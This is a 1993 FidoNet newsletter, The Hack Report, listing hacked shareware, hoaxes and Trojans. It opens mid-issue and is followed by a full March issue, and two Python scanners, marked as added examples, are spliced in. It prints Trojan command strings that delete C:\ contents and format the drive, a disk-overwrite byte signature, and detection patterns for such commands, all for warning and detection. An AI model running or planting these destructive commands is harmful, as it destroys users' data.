| Eric Alexander (1:3613/10) reported a file called PRINCE that appears to
| be a cracked commercial game of some sort.  One internal file,
| "predit.doc", contained a reference to someone called "The Fang."  I am
| not familiar with this game, so if anyone comes across Fang's version of
| PRINCE, please let me know what they've found.

| Dave Lartique (1:3800/22) found a game described as "a shareware game
| from Great Britain" called CAVEMAN.  This was described on another BBS he
| saw it on (under the filename CAVE) as an Apogee game, but it is not an
| Apogee release.  The game is called Caveman Ninja, and Dave says one of
| the internal files contains the following (somewhat garbled) text:
|
|     "DISTRIBUTED BY ELITE SYSTEM LTD   (C) 1991 DATA EAST CORPORATION"
|
| If memory serves, Data East is a producer of commercial games.  However,
| I have no knowledge of this game.  Can someone verify this?  Please
| advise.

| A message from Tony Lim (1:120/314, forwarded by Jack Cross, 1:3805/13)
| states that he had a user upload a file called TAG-NFO, which turned out
| to be a Trojan.  No details about the Trojan were given, so any
| confirmation of this would be appreciated.

  Onno Tesink (2:283/318) has sighted a file called LHA255B.  This claims
  to be version 2.55b of the LHA archiver, with a file date in the
  executable of 12/08/92.  He compared the file to the latest known
  official release, v2.13, and found two additional program options which
  were mentioned when the program was invoked with no command line
  (generating a help screen).  The archive contained nothing but the
  executable file.  Viral scans were negative.

  Many, MANY other folks have seen this file, as well as one called LHA252.
  Your Hack Squad has copies of both files.  The LHA252 file contains
  Japanese documentation, so it is a bit of a tough nut to crack.

  I have not heard of any further development going on by the author of
  LHA, H. Yoshi, but that wouldn't be a first. <g>  He is supposedly
  contactable via the NIFTY-SERVE service of CompuServe.  However, this
  service requires some knowledge of Japanese, and my only foreign language
  training was a semester of Czech at the University of Texas.

  If anyone knows of a new version of LHA, or has CompuServe access and the
  ability to converse in Japanese (and would be willing to assist), please
  contact your nearest HackWatcher or me and lend a hand.  This is getting
  very frustrating. <grin>

  HW Bill Lambdin forwards a message from Mario Giordani in the ILink Virus
  Conference about two files.  The archives, called PHOTON and NUKE, are
  possibly droppers, containing a file called NUKE.COM which "will trash
  your HD."

  Pat Finnerty (1:3627/107) sent a reply to the last report of this,
  stating that he has a copy of a PC Magazine utility called NUKE.COM,
  which is used to remove subdirectories which contain "nested subs,
  hidden, read-only (you name it)."  He says that the command NUKE C:\ will
  effectively delete everything on a hard drive, with no chance of repair.
  This is merely the way the program is designed.

  I do not know if this is what happened in Mario's case, or if Mario
  actually found a copy (read: isolated incident) which was infected. Bill
  has asked Mario for further information, and I would like to echo his
  call for help.  If you know of this, please lend a hand.

  Ned Allison (1:203/1102) forwarded a report into the FidoNet DIRTY_DOZEN
  echo from a user of The Mailbox BBS in Cleveland (216/671-7534) named
  Rich Bongiovanni.  Rich reports that there is a file floating around
  called DEMON WARS (archive name DMNWAR52) that is "infected with a
  virus."  If true, this may be an isolated incident.  I would appreciate
  confirmation on this.

  Greg Walters (1:270/612) reports a possible isolated incident of a
  problem with #1KEEN7.  When he ran the installation, he began seeing on
  his monitor "what looked like an X-rated GIF."  The file apparently
  scanned clean.  Any information on similar sightings would be
  appreciated.

  A report from Todd Clayton (1:259/210) concerns a program called
  ROBO.EXE, which he says apparently claims to "make RoboBoard run 300%
  faster."  He says he has heard that the program fools around with your
  File Allocation Table.  I have not heard any other reports of this, so I
  would appreciate some confirmation from someone else who has seen similar
  reports.

  Kelvin Lawson (2:258/71) posted a message in the SHAREWRE echo about a
  possible hack of FEBBS called F192HACK.  I have not seen this file, nor
  has the author of FEBBS, Patrik Sjoberg (2:205/208).  He forwards the
  file sizes in the archive, reported here:

        Name          Length      Mod Date  Time     CRC
        ============  ========    ========= ======== ========
        FEBBS.EXE       220841    09 Mar 92 21:17:00 96D2E08D
        014734.TXT        1403    26 Aug 92 01:59:18 3B9F717F
        ============  ========    ========= ======== ========
        *total     2    222244    26 Aug 92 01:59:24

  Kelvin says the .TXT file is just an advert for a BBS, so it is "not
  relevant!".  As I said, the author of FEBBS has never seen this file, so
  I've asked Kelvin to forward a copy of it to him.

  Andrew Owens (3:690/333.11) forwarded a report of a "Maximus BBS
| Optimiser," going under the filenames MAX-XD and MAXXD20. Scott Dudley,
  the author of Maximus, says he did not write any programs that have these
  names, but he does not know whether they are or are not legitimate third
  party utilities.  I have requested further information from Andrew on
  this topic, and would appreciate anyone else's information, if they have
  any.

  Yet another short warning comes from David Bell (1:280/315), posted in
  the FidoNet SHAREWRE echo, about a file called PCPLSTD2.  All he says is
  that it is a Trojan, and that he got his information from another
  "billboard" and is merely passing it on.  Again, please help if you know
  what is going on here.

  A message in the FidoNet ASIAN_LINK echo from Choon Hwee (1:3603/263)
  grabbed my attention the moment I saw it: in capital letters, it said,
  "DO NOT RUN this file called MODTEXT.EXE, cause it is a TROJAN!!!".  He
  goes on to say that two BBSs have been destroyed by the file.  However,
  that's about all that was reported.  I really need more to go on before I
  can classify this as a Trojan and not just a false alarm (i.e., archive
  name, what it does, etc.).  Please advise.

  Greg Mills (1:16/390) posted a question to Robert Jung in the ARJ Support
  Echo (FidoNet) about a version of ARJ called 2.33.  It was unclear as to
  whether or not Mr. Mills had seen the file.  Mr. Jung has repeated that
  the latest version of ARJ is v2.30 (however, there is a legitimate public
  "pre-release" version numbered 2.39d).  It is possible that the
  references Greg saw about 2.33 were typos, but you never know.  Please
  help your Hack Squad out on this one - if you see it, report it.

  =========================================================================

                           The Meier/Morlan List

  Here are this month's updates on the status of the files contained in the
  Meier/Morlan List.

| Matthew Revelle (1:2608/27) lent a hand on the file WINGIF14, which he
| found as WGIF14.  The documentation from this file includes the
| following:
|
|      "This is a beta release.  Please do not distribute
|       publicly but you can go ahead and give it to WinGIF
|       users that might need some of these new features.
|       The real release should be available soon!  Please
|       let me know about bugs as well as what you think of
|       the new features."
|
| What we seem to have here is a limited beta that has escaped into
| distribution.  However, from documentation excerpts sent to me by Michael
| Pfister (CompuServe address 100042,102), there has since been a full,
| non-beta release of WinGIF v1.4 that is being distributed under the same
| filename (WINGIF14).
|
| This is a confusing situation, to be sure.  However, it is simple to
| resolve:  just look at your documentation.  If your copy is a beta
| release, go find the new one.  Thanks to Matthew and Michael for their
| help - WINGIF14 is now off the list.

| Several reports came in on NAVM, all indicating that this was the version
| of Norton AntiVirus released in 1992 in response to the Michelangelo
| virus scare.  The reports, from Mark Murphy (1:132/119) and Jerry Murphy
| (1:157/2 (no relation, I think)), struck a note of recognition here at
| Hack Central Station:  thanks to both of you.  NAVM comes off the list as
| well.

  Lee Madajczyk (1:280/5) surmises that HARRIER could be Harrier Combat
  Simulator by Mindscape, Inc.  He says that he hasn't seen anything from
  them in quite a while, and doesn't know if the company is still in
  business.

  Here are the remaining unresolved reports from Emanuel Levy (1:266/63):

  "387DX  - sounds like a Math Co-Processor emulator - might be legit

  "Barkeep sounds like it may be a version of Tapper. If you send beer mugs
  down the screen to patrons and then have to pick up the returning mugs
  and they leave tips, then it is Tapper. Or it may be an OLD game
  published in Compute Mag. If it is the one from Compute only those who
  have the Compute issue with the game in it are allowed to have a copy.

  "Harrier is either Harrier Jump Jet or Space Harrier from Sega which came
  out for the Commodore 64 in 89 so I would assume it came out for IBM
  around then too.

  "Gremlins- There was a Gremlins Text Adventure and a Video Game for the
  computer. The video game was put out by Atari."

  Thanks, Emanuel.

  For those who have missed it before, here is what is left of the list of
  files forwarded by Joe Morlan (1:125/28), as compiled by Wes Meier, SysOp
  of the WCBBS (1-510-937-0156) and author of the AUNTIE BBS system.  Joe
  says Wes keeps a bulletin of all rejected files uploaded to him and the
  reasons they were rejected.  Joe also says he cannot confirm or deny the
  status of any of the files on the list.

  There are some that I am not familiar with or cannot confirm.  These are
  listed below, along with the description from Wes Meier's list.

| Due to the unconfirmed nature of the files below, the filenames are not
| included in the HACK????.COL and HACK????.IDX files that are a part of
| the archive of The Hack Report.  I would appreciate any help that
| anyone can offer in verifying the status of these files.  Until I receive
| verification on them, I will not count them as either hacks or pirated
| files.  Remember - innocent until proven guilty.

  My thanks go to Joe and Wes for their help.

        Filename  Reason for Rejection
        ========  =============================================
        BARKEEP   Too old, no docs and copyrighted with no copy
                  permission.
        HARRIER   Copyrighted.  No permission to copy granted.
        SLORGAME  Copyrighted.  No docs.  No permission to copy
                  granted.
        NOVELL    Copyrighted material with no permission to
                  BBS distribute
        DRUMS     I have no idea if these are legit or not.  No
                  docs.
        GREMLINS  No documentation or permission to copy given.
        CLOUDKM   A hacked commercial program.
        MENACE    Copyrighted.  No docs.  No permission to copy
                  granted.
        AIRBALL   A hacked commercial program.
        SNOOPY    Copyrighted.  No docs.  No permission to
                  copy granted.
        SLORDAX   Copyrighted.  No docs.  No permission to
                  copy granted.
        ESCAPE    Copyrighted.  No docs.  No permission to
                  copy granted.
        BANNER    Copyrighted.  No docs.  No permission to
                  copy granted.
        387DX     Copyrighted.  No docs or permission to
                  copy granted.
        WINDRV    Copyrighted.  No permission to copy granted.

  =========================================================================

                         Clarifications and Thanks

| I have received a message from Amit K. Mathur (Internet address
| mathur@SERVER.uwindsor.ca), the author of the KILL program reported by
| Mark Stansfield (1:115/404).  If you will remember, Mark claimed that
| this will delete the user's hard drive when run.
|
| According to Amit, this is possible if the program was accidentally told
| to delete the hard drive, since the program is a recursive directory
| deletion tool (with "tons of options" and plenty of progress/warning
| messages, according to Amit).  If you run it from your root directory
| with the proper commands, you could very well wind up with a clean hard
| drive.
|
| So, this reporter's advice is to go ahead and use without fear, but use
| with care.  Thanks for the help, Amit!

| Finally, and coming from an angle I never expected, Rick Moen (CompuServe
| address 76711,243) points out quite rightly that your Hack Squad has been
| a bit biased toward the American version of the English language.
| Specifically, he said that my "Maximus BBS Optimiser (sic)" comment was
| not correct, especially since the report came from Australia.  Seems that
| the folks from Oz and most of the rest of the world tend to use an S
| instead of a Z to spell the word OPTIMIZER.
|
| For those who aren't familiar with it, "sic" is used at times by a writer
| to point out that the spelling of the previous word might be incorrect,
| but it's a direct copy of the original author's spelling.  So, thanks to
| Rick's sharp eyes, I have removed the "(sic)" comment from that portion
| of the report.  (FYI, Rick, I _do_ use the correct spelling for words
| like "catalogue" and "theatre". <grin>)

  =========================================================================

                                  Help!!!

  Would the person who sent the copy of Vegas Casino 2 (filename VEGAS2) to
  The Hack Squad for testing/verification please re-identify themselves via
  NetMail?  Somehow, your message went to the great Bit Bucket in the sky.
  Thanks in advance!

  *************************************************************************

                                Conclusion

  If you see one of these on a board near you, it would be a very friendly
  gesture to let the SysOp know.  Remember, they can get in just as much
  trouble as the fiend who uploads pirated files, so help them out if you
  can.

                          ***HACK SQUAD POLICY***

  The intent of this report is to help SysOps and Users to identify
  fraudulent files.  To this extent, I give credit to the reporter of a
  confirmed hack.  On this same note, I do _not_ intend to "go after" any
  BBS SysOps who have these programs posted for d/l.  The Shareware World
  operates best when everyone works together, so it would be
  counter-productive to "rat" on anyone who has such a file on their board.
  Like I said, my intent is to help, not harm.  SysOps are strongly
  encouraged to read this report and remove all files listed within from
  their boards.  I can not and will not take any "enforcement action" on
  this, but you never know who else may be calling your board.  Pirated
  commercial software posted for d/l can get you into _deeply_ serious
  trouble with certain authorities.

  Updates of programs listed in this report need verification.  It is
  unfortunate that anyone who downloads a file must be paranoid about its
  legitimacy.  Call me a crusader, but I'd really like to see the day that
  this is no longer true.  Until then, if you _know_ of a new official
  version of a program listed here, please help me verify it.

  By the same token, hacks need to be verified, too.  I won't be held
  responsible for falsely accusing the real thing of being a fraud.  So,
  innocent until proven guilty, but unofficial until verified.

  Upcoming official releases will not be included or announced in this
  report.  It is this Co-Moderator's personal opinion that the hype
  surrounding a pending release leads to hacks and Trojans, which is
  exactly the opposite of what I'm trying to accomplish here.

  If you know of any other programs that are hacks, bogus, jokes, hoaxes,
  etc., please let me know.  Thanks for helping to keep shareware clean!

                   Lee Jackson, Author, The Hack Report
       Co-Moderator, FidoNet International Echo SHAREWRE (1:382/95)
                Moderator, FidoNet Echo WARNINGS (1:382/95)

The Hack Report Volume 2, Number 3 (March 7, 1993)

  =========================================================================
                                    ||
  From the files of The Hack Squad: ||  by Lee Jackson, Co-Moderator,
                                    ||  FidoNet International Echo SHAREWRE
          The Hack Report           ||  Volume 2, Number 3
          for March, 1993           ||  Report Date: March 7, 1993
                                    ||
  =========================================================================

  Welcome to the third 1993 issue of The Hack Report.  This is a series of
  reports that aim to help all users of files found on BBSs avoid
  fraudulent programs, and is presented as a free public service by the
  FidoNet International Shareware Echo and the author of the report, Lee
  Jackson (FidoNet 1:382/95).

  This month, another commercial software company contacts your Hack Squad,
  and several new Trojans rear their ugly heads.  Also, this issue
  introduces some minor formatting changes and an addition to the archive
  version:  an internal archive with the full text of file tests performed
  this year.  Thanks to everyone who has helped put this report together,
  and to those that have sent in comments and suggestions.

  NOTE TO SYSOPS: The Hack Report may be freely posted as a bulletin on
  your BBS, subject to these conditions:

             1) the latest version is used,
             2) it is posted in its entirety, and
             3) it is not altered in any way.

  NOTE TO OTHER READERS: The Hack Report (file version) may be freely
  uploaded to any BBS, subject to the above conditions, and only if you do
  not change the filename.  You may convert the archive type as you wish,
  but please leave the filename in its original HACK????.* format.  The
  Hack Report may also be cross-posted in other networks (with the
  permission of the other network) as long as it meets the above conditions
  and you give appropriate credit to the FidoNet International Shareware
  Echo (and the author <g>).

  The idea is to make this information available freely.  However, please
  don't cut out the disclaimers and other information if you use it, or
  confuse the issue by spreading the file under different names.  Thanks!

  DISCLAIMER: The listings of Official Versions are not a guarantee of the
  files' safety or fitness for use.  Someone out there might just be
  sick-minded enough to upload a Trojan with an "official" file name, so
  >scan everything you download<!!!  The author of this report will not be
  responsible for any damage to any system caused by the programs listed as
  Official Versions, or by anything using the name of an Official Version.

  *************************************************************************

                              Hacked Programs

  Here are the latest versions of some programs known to have hacked copies
  floating around.  Archive names are listed when known, along with the
  person who reported the fraud (thanks from us all!).

   Program              Hack(s)                    Latest Official Version
   =======              =======                    =======================
|  ARJ Archiver         ARJ250                     ARJ239C (* - see note)
|     Reported By:  Tommy Vielkanowitz (1:151/2305)
|                       ARJ240A
|     Reported By:  Ryan Shaw (1:152/38)

|  Blue Wave Offline    BWAVE_3                    BWAVE212
|   Mail Reader
|     Reported By: HW Scott Raymond

   BNU FOSSIL Driver    BNU202                     BNU170
      Reported By: Amauty Lambrecht (2:291/712)    (not counting betas)
                        BNU188B
      Reported By: David Nugent (3:632/348),
                    Author of BNU

|  F-Prot Virus Scanner FP-205B                    FP-207
      Reported By: Bill Lambdin (1:343/45)

   LhA Amiga Archiver   LHA148E                    LHA138E (Shareware)
      Reported By: Michael Arends (1:343/54)       LHA v1.50r (Regist.)
                        LHA151
      Reported By: Lawrence Chen (1:134/3002)

|  MusicPlay            MPLAY31                    MPLAY25B
|     Reported By: Lee Madajczyk (1:280/5)

   PKLite               PKLTE201                   PKL115
      Reported By: Wen-Chung Wu (1:102/342)

|  PKZip                PKZ301                     PKZ204G
      Reported By: Mark Dudley (1:3612/601)
                   Jon Grimes (1:104/332)

|  Shez                 SHEZ72A                    SHEZ87
                        SHEZ73
      Reported By: Bill Lambdin (1:343/45)

   Telix                Telix v3.20                TLX320-1
                         (Prior to Dec. 1992)      TLX320-2
                        Telix v3.25                TLX320-3
      Reported By: Brian C. Blad (1:114/107)       TLX320-4
                   Peter Kirn (WildNet, via
                                 Ken Whiton)
                        Telix v4.00
                        Telix v4.15
      Reported By: Barry Bryan (1:370/70)
                        Telix v4.25
      Reported By: Daniel Zuck (2:247/30, via Chris
                    Lueders (2:241/5306.1)
                        MegaTelix
      Verified By Jeff Woods, deltaComm, Inc.
        Please Note - the 3.20 release dated either December 10th
        or December 14th, 1992, is legitimate:  any earlier file
        calling itself v3.20 and carrying an Exis, Inc. trademark
        is not legitimate.  Please thoroughly check your version
        prior to sending questions to this reporter! <g>
                        Telix Pro
     Reported By: Jason Engebretson (1:114/36),
                   in the FidoNet TELIX echo

   Wolfenstein-3D       WOLF2-1                    #1WOLF14
                        WOLF2-2
      Reported By: Wen-Chung Wu (1:102/342)

|       * - Quick break with tradition:  by the time you read this,
|           ARJ239D may have been released.  Robert Jung has announced
|           that this is a bug fix to the current pre-release, ARJ239C.

  =========================================================================

                                Hoax Alert:

| This isn't a program hoax, but it concerns a company that most folks know
| of.  You might want to see this.
|
| A letter/text file/message has entered distribution, claiming that PKWare
| Inc. has filed for Chapter 11 bankruptcy.  The letter is dated Friday,
| February 26, 1993, and supposedly quotes Mark Gresbach of PKWare in the
| statement.
|
| However, in a message posted in the CompuServe PKWARE forum on March 1,
| 1993, PKWare employee Douglas Hay states that this is not true.  Douglas
| also points out that the perpetrator of the hoax misspelled the word
| Milwaukee (as 'Milwaukie'), and that one of the three phone numbers in
| the message for PKWare is wrong.  In short, ignore the letter - PKWare
| has _not_ filed bankruptcy.

  Other previously reported hoaxes:

  Filename      Claimed use/Actual activity/Reporter(s)
  ============  ==========================================================
  PKZ305        Hacked "new version" of PKZip.  However, a message in wide
                circulation claimed this was infected with a virus called
                PROTO-T.  This message is the actual hoax:  there may be
                one or more PROTO-T viruses around now, but none do what
                was claimed in the hoax message.  This hack, PKZ305, was
                not infected with any virus, nor did it contain Trojan
                code, per testing by Bill Logan (1:300/22), Jeff White
                (1:300/23), and Bill Lambdin (1:343/45).

  RAOPT         "Optimizes" your RemoteAccess BBS files and claims to be
                from Continental Software.  Actually does nothing but read
                your USERS.BBS file and report the number of users.  The
                program is _not_ from Continental Software, according to
                Andrew Milner.  Reported by Kai Sundren (2:201/150), via
                HW Mikael Winterkvist.

  SCORCHV2      Claims to be v2.0 of the game Scorched Earth:  this version
                doesn't yet exist.  Actually a renamed archive of version
                1.2.  Reported by Brian Dhatt (1:3648/2.5).

  =========================================================================

                              The Trojan Wars

  Trojan writers seem to be getting a bit trickier with their code lately -
  two of this month's reports involve "multipartite Trojans," or Trojans
  whose code is split among two or more files and reassembled by a "clean"
  program.  In honor of this, I recommend that you grab a Banana Split,
  cover your keyboard, and read on.

| Last month's issue included a report on a "fix" for PKZip v2.04c (yes, I
| mean 2.04c this time) that corrected the -$ (store disk volume) bug.  The
| bulk of the report came from Jeff White of The Pueblo Group in Tucson,
| Arizona, and had reference to some suspicious code in the file.
|
| The biggest question brought up by the test concerned the following code:
|
|     Address:  0000d0e0-0000d110
|     Code:     x:/ x:  *.* /  Erasing contents of drive, completed.
|
| I have received a message from a user whose name I no longer have on file
| (please forgive me - NetMail me and I'll add your name to the report!)
| which states that this same text string can be seen within legitimate
| versions of PKZip (both v2.04e and the latest, v2.04g).  It can't be seen
| by using a file/hex viewer, but it can be seen if the code is debugged,
| and only after the program has un-PKLited itself.
|
| *** EDITOR'S NOTE - I need to state that this is not something that I
| encourage, since many shareware licenses state that debugging,
| disassembly, and/or reverse engineering is not allowed.  However,
| hopefully the folks at PKWare won't mind this bit of software sleuthing,
| since it is in their best interest to get to the heart of this matter.
|
| If you want to see the full text of the test results on this, see the
| file PKZIPFIX.RES in the archive FILETSTS.LZH, included in the archive
| version of The Hack Report.
|
| As always, our thanks go out to Bill and Jeff for their invaluable help.

  William Gordon (1:369/104) reports BEV105, a file that claims to be a
  "Beverly Hills 90210 Adventure Game."  This file contains 8 files, but
  two seem to be the real culprits:  DORINFO.DIR and INSTALL.COM.  The
  installation renames the DORINFO.DIR file to IDCKILL.EXE and invokes it.
  This program asks for some sort of wildcard according to William, then
  proceeds to delete everything on your drive that matches that wildcard.
  However, it doesn't stop there:  it continues on and deletes all .bat,
  .fon, .com, .zip, .sys, .ice, .ans, .arj, and .exe files.  William also
  says the file "comes with the following virii:  Bootkill and Genesis."

| A copy of this file was sent to Mr. White and Mr. Logan, who were able to
| confirm the behaviour that William reported.  For the complete results of
| their test, see the file BEV105.RES in the FILETSTS.LZH archive, included
| in the archive version of The Hack Report.

| Bill Lambdin (1:343/45) forwards a message from Terry Goodman in the U'NI
| Net virus conference concerning the file SCOMP.  This was advertised as a
| compression utility with better compression than PKZip.  The file passes
| all virus checkers unless you also check data files in addition to
| executables.  In short, the executable loads a file called SCOMP.DAT,
| which it uses to create a file called CASPER.COM, which is apparently the
| Casper virus.

| Another report from Bill concerns a file he located called TAXTIP93.
| This archive contains a file called TAXTIP93.DAT, which the executable
| file, TAXTIPS.EXE, renames to MOUSE.COM and tries to copy to your DOS and
| WINDOWS directory.  The new MOUSE.COM is infected with the ADA virus.

| Brian Chan (Internet, chanav@sfu.ca) found a file called PASSPRO, which
| was described with a very short line ("'Password,' or some other short
| word," according to Brian).  The archive contained these files:
|
|                              PASS    .PA1
|                              PASS    .PA2
|                              PASS    .PA3
|                              PASSWORD.COM
|
| Brian looked inside the .com file, which he says looks like a compiled
| batch file, and found these strings/commands:
|
|     Please Wait While Loading;
|     It may take in between 30seconds to 5 minutes
|     To unshrink nessessary files
|     Please Turn off Screen, and wait for the beep.
|     If You do not, your screen might not function
|     the way it should.
|     Turn Off Screen now, and press the space bar.
|
|     /C REN pass.pa1 pa.exe
|     pass.pa2 /C DEL c:\*.*
|     pass.pa2 /C DEL c:\dos\*.*
|     /C REN pa.exe pass.pa1
|     pass.pa3 FORMAT
|     c:
|     /C CLS
|
| As you can see, PASS.PA1 gets renamed to PA.EXE - the file, compressed
| with PKLite, is actually Microsoft's MS-DOS ATTRIB.EXE program.  PASS.PA2
| contains the single letter 'Y', and PASS.PA3 contains the single word
| 'Yes'.  From the looks of things, this turns out to be a multipartite
| Trojan that attempts to format (what else?) your hard drive.
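
  A static triage pass over an unpacked upload, as an added example that is
  not part of The Hack Report.  It flags the traits visible in Brian's
  PASSPRO listing: an EXE header hiding behind a data extension, tiny files
  holding a canned "Y"/"Yes" answer, and command strings that rename a data
  file to an executable, delete by wildcard, or mention FORMAT.  The member
  contents in SAMPLE are constructed stand-ins based on the description
  above; the finding names and the EXEC_EXTS list are assumptions.

```python
import re

# Extensions DOS will run directly; everything else is treated as "data".
# (Assumed list for this example.)
EXEC_EXTS = {"COM", "EXE", "BAT", "SYS"}

REN_RE = re.compile(r"\bREN(?:AME)?\s+(\S+)\s+(\S+)", re.I)
DEL_RE = re.compile(r"\b(?:DEL|ERASE)\s+(\S*\*\.\*)", re.I)
FORMAT_RE = re.compile(r"\bFORMAT\b", re.I)


def ext(name):
    """Upper-cased extension of a DOS file name, or '' if there is none."""
    return name.rsplit(".", 1)[1].upper() if "." in name else ""


def extract_strings(data, min_len=4):
    """Printable-ASCII runs of at least min_len bytes, like `strings`."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def triage(members):
    """members: {filename: bytes} for one unpacked upload.

    Returns sorted (filename, finding, detail) tuples. These are leads for
    a human reviewer, not verdicts: FORMAT, for instance, is a common word.
    """
    findings = []
    for name, data in members.items():
        is_exec = ext(name) in EXEC_EXTS
        # A DOS EXE keeps its "MZ" header even when PKLite-compressed.
        if not is_exec and data[:2] == b"MZ":
            findings.append((name, "exe-header-in-data-file", "MZ"))
        # A file that is nothing but an affirmative answer to a prompt.
        answer = data.strip()
        if not is_exec and answer.upper() in (b"Y", b"YES"):
            findings.append((name, "canned-confirmation", answer.decode("ascii")))
        # Data files are searched too, not only executables.
        for text in extract_strings(data):
            m = REN_RE.search(text)
            if m and ext(m.group(2)) in EXEC_EXTS and ext(m.group(1)) not in EXEC_EXTS:
                findings.append(
                    (name, "rename-to-executable", f"{m.group(1)} -> {m.group(2)}"))
            for m in DEL_RE.finditer(text):
                findings.append((name, "wildcard-delete", m.group(1)))
            if FORMAT_RE.search(text):
                findings.append((name, "format-command", text.strip()))
    return sorted(findings)


# Constructed sample: file names and command strings follow the report,
# the surrounding bytes are filler.
SAMPLE = {
    "PASS.PA1": b"MZ" + b"\x00" * 62,
    "PASS.PA2": b"Y",
    "PASS.PA3": b"Yes",
    "PASSWORD.COM": b"\xeb\x10\x00" + b"\x00".join([
        b"Please Wait While Loading;",
        rb"/C REN pass.pa1 pa.exe",
        rb"pass.pa2 /C DEL c:\*.*",
        rb"pass.pa2 /C DEL c:\dos\*.*",
        rb"/C REN pa.exe pass.pa1",
        b"pass.pa3 FORMAT",
        b"/C CLS",
    ]) + b"\x00\xcd\x20",
}

if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row)
```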

| Another multipartite Trojan was spotted by James Frazee (1:343/58), under
| the filename ADD_IT.  It contains these files:
|
|                 Name of File    Size  Date
|                 ADD_IT.ARJ     40888 02-11-93
|                 =======================================
|                 ADDIT1   DAT     34283 07-20-91   2:13a
|                 ADD_IT   ANS       646 02-11-93   8:31p
|                 ADDIT2   DAT     20634 04-09-91   5:00a
|                 ADDIT    DOC       177 02-11-93   7:28p
|                 ADDIT    COM      1391 02-11-93   8:14p
|                 ADDIT3   DAT       138 02-11-93   8:13p
|                 THEDRAW  PCK       650 02-11-93   8:31p
|
| When run, ADDIT.COM merges the three .DAT files into an .EXE file.  The
| end result was that the program deleted all of the files in the directory
| in which it was run.

| Matt Hargett (1:2430/1532) found a file called DRSLEEP which he says has
| a "cheap virii (sic) in it," but actually appears to be a Trojan.  When
| the executable, DRSLEEP.EXE is run, it deletes your COMMAND.COM file.
| Not much to write home about, but nasty enough.  Thanks, Matt.

| Brent Thomas (1:202/226) says in the FidoNet DIRTY_DOZEN echo that his
| system was "taken down" by a file called DRAGON.  It claimed to be a
| Public Domain VGA and Sound Blaster supported game.  No symptoms were
| reported, except that he had to reformat his hard drive.

| Josh Burke (1:138/174) reports, via Charlie Sheridan (1:356/18), Travis
| Griggs (1:3807/8), and HW Bob Seaborn, a problem with the file PHYLOX2.
| In what might be an isolated incident, Josh says the file claimed to be a
| "really cool game, VGA gfx and SB sound."  However, the INSTALL program
| destroys hard disks.
|
| Bob Seaborn received a copy of this file and forwarded it to me - as soon
| as possible, I will try to get it tested to see just exactly what it
| does.

| John Balkunas (1:107/639) forwards information on GIFCHECK.  He reports
| that Lance Merlen (1:107/614) received an upload of this file, which,
| when checked with McAfee's ViruScan v100, reported over 5 viruses in the
| files in the archive.  No internal archive data was provided, so it is
| hard to say whether or not this is an isolated incident.

  Zack Jones (1:387/641) reports a file called GAGS which was seen in the
  San Antonio area.  The file, described as "Some Christmas practical
  jokes," was analyzed by Bill Dirks (1:385/17) and confirmed as a Trojan.
  The program grabs control of several interrupt vectors, including the
  critical error handler.  The only way to stop it once it starts is to hit
  the reset button or power down.

  When invoked, it displays a countdown from 8 to 0, which corresponds to
  drives H through A, in that order.  For each found drive, it overwrites
  the first 255 sectors with random data from a block of memory.  To add
  insult to injury, if drives B and A are empty, you are prompted to insert
  disks (so that they can be trashed as well).

  After this, the Trojan displays a message that includes something like,
  "the disk was trashed but it's only a joke and they are only kidding."
  It then prompts you to reboot, which is rather hard to do unless you have
  a bootable "panic disk" floppy on hand - you certainly won't be able to
  boot from your HD.

  Bill says that if your HD is smaller than 60 megs, you're better off
  trying to recover your disk from scratch.  Between 60-120 megs, you have
  a better chance of recovery via disk utilities:  over 120 megs, you
  should be able to accomplish a complete recovery if you're careful and
  you know what you're doing.

  Bill posted the following scan string that can be used to detect this
  Trojan - if your scanner can use external strings, be sure to read the
  instructions carefully before trying to add this:

               9A46027205B003B9FF00BA0000CD26

  If your scanner requires a name for the string, Bill suggests using
  "AlamoXmasTrojan."

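  One way to apply an external scan string like Bill's, as an added example
  that is not part of The Hack Report.  It searches every file under a
  directory regardless of extension, because the SCOMP report above shows a
  carrier hidden in a data file.  The function names, file names and file
  contents in demo() are constructed for the illustration; only the scan
  string and its name come from the report.

```python
import os
import tempfile

# Scan string and suggested name exactly as given in the report.
# The bytes B0 03 / B9 FF 00 / BA 00 00 / CD 26 decode as MOV AL,3;
# MOV CX,00FFh; MOV DX,0; INT 26h (DOS absolute disk write, CX = sector
# count), consistent with the 255-sector overwrite described above.
SCAN_STRINGS = {"AlamoXmasTrojan": "9A46027205B003B9FF00BA0000CD26"}


def compile_scan_strings(scan_strings):
    """Turn {name: hex text} into {name: bytes}, rejecting malformed input."""
    compiled = {}
    for name, hex_text in scan_strings.items():
        cleaned = "".join(hex_text.split())
        if not cleaned or len(cleaned) % 2:
            raise ValueError(f"{name}: scan string must be whole hex bytes")
        compiled[name] = bytes.fromhex(cleaned)  # ValueError on non-hex
    return compiled


def scan_file(path, compiled, chunk_size=65536):
    """Return {name: file offset of first match} for one file.

    The file is read in chunks; the last (longest pattern - 1) bytes of
    each buffer are carried over so a match that straddles a chunk
    boundary is still found.
    """
    overlap = max(len(p) for p in compiled.values()) - 1
    hits, tail, base = {}, b"", 0  # base = file offset of buf[0]
    with open(path, "rb") as fh:
        while len(hits) < len(compiled):
            chunk = fh.read(chunk_size)
            if not chunk:
                break
            buf = tail + chunk
            for name, pattern in compiled.items():
                if name not in hits:
                    pos = buf.find(pattern)
                    if pos != -1:
                        hits[name] = base + pos
            tail = buf[-overlap:] if overlap else b""
            base += len(buf) - len(tail)
    return hits


def scan_tree(root, compiled, chunk_size=65536):
    """Scan every file under root; return {relative path: hits} for matches."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in sorted(files):
            full = os.path.join(dirpath, fname)
            hits = scan_file(full, compiled, chunk_size)
            if hits:
                report[os.path.relpath(full, root)] = hits
    return report


def demo():
    """Constructed files: one clean, two carrying the scan string."""
    sig = bytes.fromhex(SCAN_STRINGS["AlamoXmasTrojan"])
    files = {
        "README.TXT": b"Some Christmas practical jokes\r\n",
        "SAMPLE.EXE": b"MZ" + b"\x00" * 98 + sig + b"\x00" * 40,
        # Data extension; with chunk_size=16 the match straddles a boundary.
        "SAMPLE.DAT": b"\x11" * 10 + sig + b"\x22" * 10,
    }
    with tempfile.TemporaryDirectory() as root:
        for name, data in files.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(data)
        return scan_tree(root, compile_scan_strings(SCAN_STRINGS), chunk_size=16)


if __name__ == "__main__":
    for path, hits in sorted(demo().items()):
        print(path, hits)
```

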